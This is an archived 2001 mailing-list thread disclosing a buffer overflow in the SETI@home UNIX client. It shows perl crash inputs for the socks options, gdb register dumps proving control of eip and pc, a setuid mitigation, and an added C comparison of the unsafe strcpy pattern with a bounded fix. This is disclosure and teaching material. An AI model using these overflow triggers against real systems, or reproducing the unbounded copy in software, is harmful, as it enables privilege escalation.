Vulnerability Development mailing list archives
Re: Vulnerability in SETI@home
From: dotslash () snosoft com
Date: Sat, 1 Dec 2001 23:33:49 -0800
Also, in Joe's post he did not show an EIP overwrite, but on OS X we are able to overwrite the PC register.
Starting program: /Users/elguapo/./setiathome-3.03.powerpc-apple.1/setiathome -socks_user `perl -e 'print "A" x 9000'`
[Switching to thread 1 (process 612 thread 0x1907)]

Program received signal EXC_BAD_ACCESS, Could not access memory.
0x41414140 in ?? ()
(gdb) i r
r0             0x278c      10124
r1             0xbfffd670  3221214832
r2             0x3021c     197148
r3             0x16250     90704
r4             0x201       513
r5             0x1a4       420
r6             0x400       1024
r7             0x2e        46
r8             0x170       368
r9             0x3         3
r10            0x53        83
r11            0x2cbc4     183236
r12            0x41414141  1094795585
r13            0x0         0
r14            0x0         0
r15            0x0         0
r16            0x0         0
r17            0x0         0
r18            0x0         0
r19            0x0         0
r20            0x0         0
r21            0x3         3
r22            0x0         0
r23            0x1         1
r24            0xffffffff  4294967295
r25            0x0         0
r26            0x0         0
r27            0x1         1
r28            0xbfffd7e0  3221215200
r29            0x0         0
r30            0x0         0
r31            0x2774      10100
pc             0x41414140  1094795584
ps             0x4000f030  1073803312
cr             0x22000284  570425988
lr             0x278c      10124
ctr            0x41414141  1094795585
xer            0x20        32
mq             0x0         0
fpscr          0x0         0
vrsave         0x0         0

-KF

On Sunday, December 2, 2001, at 03:15 PM, joetesta () hushmail com wrote:
-----BEGIN PGP SIGNED MESSAGE-----

Vulnerability in SETI@home

Overview

SETI@home (http://setiathome.berkeley.edu/) is a distributed project that allows ordinary citizens to participate in the search for extraterrestrial intelligence using their computer's idle time. A buffer overflow exists in the UNIX client software.

NOTE: this vulnerability is NOT exploitable in the default installation.

Details

The "i386-pc-linux-gnu-gnulibc2.1" version of the setiathome client (and possibly others) is vulnerable to buffer overflow. Example:

# ./setiathome -version
SETI@home client.
Platform: i386-pc-linux-gnu-gnulibc2.1
Version: 3.03
...
...
# ./setiathome -socks_server `perl -e 'print "A" x 5604;'`
Segmentation fault
# ./setiathome -socks_user `perl -e 'print "A" x 5344;'`
Segmentation fault
# ./setiathome -socks_passwd `perl -e 'print "A" x 5280;'`
Segmentation fault
#

[root@seti /home/setiathome]# gdb setiathome
GNU gdb 5.0rh-5 Red Hat Linux 7.1
Copyright 2001 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(no debugging symbols found)...
(gdb) r -socks_server `perl -e 'print "A" x 5604;'`
Starting program: /home/setiathome/setiathome -socks_server `perl -e 'print "A" x 5604;'`

Program received signal SIGSEGV, Segmentation fault.
0x2ab4d409 in strcpy () from /lib/libc.so.6
(gdb) info registers
eax            0x0         0
ecx            0x40404040  1077952576
edx            0x41414141  1094795585
ebx            0xfefefeff  -16843009
esp            0x7fffe664  0x7fffe664
ebp            0x7fffe6bc  0x7fffe6bc
esi            0x7ffffe28  2147483176
edi            0x807bffd   134725629
eip            0x2ab4d409  0x2ab4d409
eflags         0x10246     66118
cs             0x23        35
ss             0x2b        43
ds             0x2b        43
es             0x2b        43
fs             0x0         0
gs             0x0         0
fctrl          0x37f       895
fstat          0x0         0
ftag           0xffff      65535
fiseg          0x0         0
fioff          0x0         0
foseg          0x0         0
fooff          0x0         0
fop            0x0         0

Solution

The SETI@home UNIX client is not installed with a setuid bit by default. If one was added to it -- perhaps to run it under a 'setiathome' account -- remove it immediately.

Vendor Status

The project director, Dr. Dave P. Anderson, was contacted via <davea () ssl berkeley edu> on Monday, Nov 5th. He promptly replied that this problem will be fixed in the next release.

- Joe Testa
e-mail: joetesta () hushmail com
web page: http://hogs.rit.edu/~joet/
AIM: LordSpankatron

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wl0EARECAB0FAjwKtmIWHGpvZXRlc3RhQGh1c2htYWlsLmNvbQAKCRA/wHT6vruBNGeO
AJ9lCce/+Xb91i7BzpWvEiGfnUmBTgCginYcBQJ1WcuQeBC/RDyELpNvKIQ=
=M4UW
-----END PGP SIGNATURE-----
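Both register dumps in this thread describe the same defect: a command-line value is copied with strcpy into a fixed-size buffer, so a long enough -socks_server / -socks_user / -socks_passwd argument runs over the saved frame (edx=0x41414141 inside strcpy on Linux; pc=0x41414140 on PowerPC, where the low two bits of a branch target taken from the overwritten link register are ignored, hence 0x40 rather than 0x41). The C below is an added example written for this page, not SETI@home's own code: it places that unsafe copy next to a bounded argv parser that rejects over-long values rather than truncating them. SOCKS_FIELD_MAX, struct socks_config and all function names are assumptions for illustration; the page does not give the client's real buffer size, only that 5280 to 5604 bytes on Linux and 9000 on OS X are enough to crash it.

```c
/* Added example, not SETI@home's code: the argv-to-fixed-buffer pattern
 * behind the crashes in this thread, next to a bounded replacement.
 * SOCKS_FIELD_MAX, struct socks_config and the function names are
 * assumptions for illustration; the client's real buffer size is not
 * given on the page. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SOCKS_FIELD_MAX 256   /* assumed; only "5280..5604 bytes crash it" is known */

struct socks_config {
    char server[SOCKS_FIELD_MAX];
    char user[SOCKS_FIELD_MAX];
    char passwd[SOCKS_FIELD_MAX];
};

/* Vulnerable pattern: unbounded strcpy of an attacker-chosen argv string
 * into a fixed buffer. Everything past the buffer (saved frame pointer,
 * return address on x86, saved link register on PowerPC) is overwritten,
 * which is what edx=0x41414141 inside strcpy and pc=0x41414140 show.
 * Kept only for comparison; never call it with untrusted input. */
static void set_field_unsafe(char *dst, const char *src)
{
    strcpy(dst, src);                      /* no length check at all */
}

/* Bounded replacement. Rejects a value that does not fit (with its NUL)
 * instead of truncating, so an over-long option is an error, not a
 * silently corrupted proxy name. Returns 0 on success, -1 if rejected.
 * memchr is bounded by dstsz, so it never reads past a short buffer. */
static int set_field_checked(char *dst, size_t dstsz, const char *src)
{
    const char *nul = memchr(src, '\0', dstsz);
    if (nul == NULL)
        return -1;                         /* longer than dstsz - 1 */
    memcpy(dst, src, (size_t)(nul - src) + 1);
    return 0;
}

/* Minimal "-socks_server VALUE" style parser over argv. Returns the number
 * of socks fields stored, or -1 on the first rejected or missing value,
 * leaving cfg untouched for that value. Unrelated options are skipped. */
int parse_socks_args(int argc, char **argv, struct socks_config *cfg)
{
    int stored = 0;
    for (int i = 1; i < argc; i++) {
        char *dst;
        if (strcmp(argv[i], "-socks_server") == 0)      dst = cfg->server;
        else if (strcmp(argv[i], "-socks_user") == 0)   dst = cfg->user;
        else if (strcmp(argv[i], "-socks_passwd") == 0) dst = cfg->passwd;
        else continue;
        if (i + 1 >= argc)
            return -1;                     /* option without a value */
        if (set_field_checked(dst, SOCKS_FIELD_MAX, argv[++i]) != 0)
            return -1;
        stored++;
    }
    return stored;
}

/* Feeds "A" x len (the perl payload from the thread) as -socks_user
 * through the checked parser; returns the parser's result
 * (1 = stored, -1 = rejected). */
int try_socks_user(size_t len)
{
    struct socks_config cfg;
    char *val = malloc(len + 1);
    if (val == NULL)
        return -1;
    memset(val, 'A', len);
    val[len] = '\0';
    char *argv[] = { "setiathome", "-socks_user", val };
    memset(&cfg, 0, sizeof cfg);
    int r = parse_socks_args(3, argv, &cfg);
    free(val);
    return r;
}

/* Well-formed command line (constructed sample): returns 1 when both
 * fields are stored intact, 0 otherwise. */
int demo_normal(void)
{
    struct socks_config cfg;
    char *argv[] = { "setiathome", "-socks_server", "proxy.example.net",
                     "-socks_user", "kf" };
    memset(&cfg, 0, sizeof cfg);
    if (parse_socks_args(5, argv, &cfg) != 2)
        return 0;
    return strcmp(cfg.server, "proxy.example.net") == 0
        && strcmp(cfg.user, "kf") == 0;
}

int main(void)
{
    printf("normal command line stored: %d\n", demo_normal());
    printf("9000 x 'A' as -socks_user: %d (rejected, no overflow)\n",
           try_socks_user(9000));
    (void)set_field_unsafe;                /* not exercised: it would crash */
    return 0;
}
```

The practical caveat from the advisory still applies to the fixed version: an overflow reachable only through the program's own argv crosses a privilege boundary only when the binary is setuid or is launched with someone else's arguments, which is why removing a stray setuid bit is the immediate mitigation and the bounded copy is the code fix.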
Current thread:
- Vulnerability in SETI@home joetesta (Dec 02)
- Re: Vulnerability in SETI@home dotslash (Dec 03)
- Re: Vulnerability in SETI@home dotslash (Dec 03)